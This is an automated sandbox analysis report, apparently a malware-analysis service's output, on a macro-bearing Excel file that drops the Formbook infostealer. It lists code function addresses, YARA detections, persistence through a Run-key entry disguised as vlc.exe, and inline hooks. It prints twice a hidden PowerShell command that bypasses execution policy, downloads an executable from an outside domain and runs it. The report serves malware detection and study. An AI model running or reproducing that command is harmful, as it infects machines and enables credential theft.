          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391002
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A20A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB090
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A28EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2B28
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139231B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F3360
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FAB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137CB4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130EBB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01328BE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013903DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130ABD8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139DBD2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FA2B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A32A9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A22AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E2C5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D0D20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2D07
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1D55
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2D50
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A25DD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E841F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139CC77
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB477
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139D466
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394496
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304CD4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013967E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013ADFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F6E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139D616
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F5600
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135AE60
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01381EB6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2EF7
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00401030
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041D96D
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DAB1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DCBF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402D88
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402D90
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00409E40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00409E3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DF98
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CFA3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402FB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01344120
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0132F900
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013499BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A830
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FE824
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E1002
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013520A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F20A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133B090
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F28EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2B28
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A309
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134AB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135EBB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013D23E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E03DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013EDBD2
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135ABD8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013DFA2B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F22AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E4AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01320D20
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2D07
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1D55
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01352581
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E2D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133D5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F25DD
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133841F
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED466
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E4496
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FDFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01346E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED616
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2EF7
          Source: 5901777.xlsOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
          Source: 5901777.xlsOLE indicator, VBA macros: true
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0041BBE0 appears 38 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0132D08C appears 48 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 012DB150 appears 159 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 01365720 appears 85 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0132B150 appears 133 times
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5901777.xls, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: oftmhayq.exe.20.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vlc.exe.25.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winXLS@16/12@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.datJump to behavior
          Source: 5901777.xlsOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\Public\oftmhayq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\Public\oftmhayq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5901777.xlsVirustotal: Detection: 23%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: oftmhayq.exe

          Data Obfuscation:

          barindex
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730EB90 pushad ; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730219F push E9000001h; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BE219F push E9000001h; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_004178AD push 00000001h; retf
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_004172D7 push edi; retf
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419D5A push ebp; iretd
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040D695 push esp; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF6C push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF02 push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF0B push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0132D0D1 push ecx; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_004178AD push 00000001h; retf
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_004172D7 push edi; retf
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419D5A push ebp; iretd
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0040D695 push esp; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF6C push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF02 push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CF0B push eax; ret
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0137D0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112
          Source: initial sampleStatic PE information: section name: .text entropy: 7.97600028112

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\oftmhayq.exeJump to dropped file
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLANJump to behavior
          Source: C:\Users\Public\oftmhayq.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeJump to behavior
          Source: C:\Users\Public\oftmhayq.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior
          Source: C:\Users\Public\oftmhayq.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlcJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
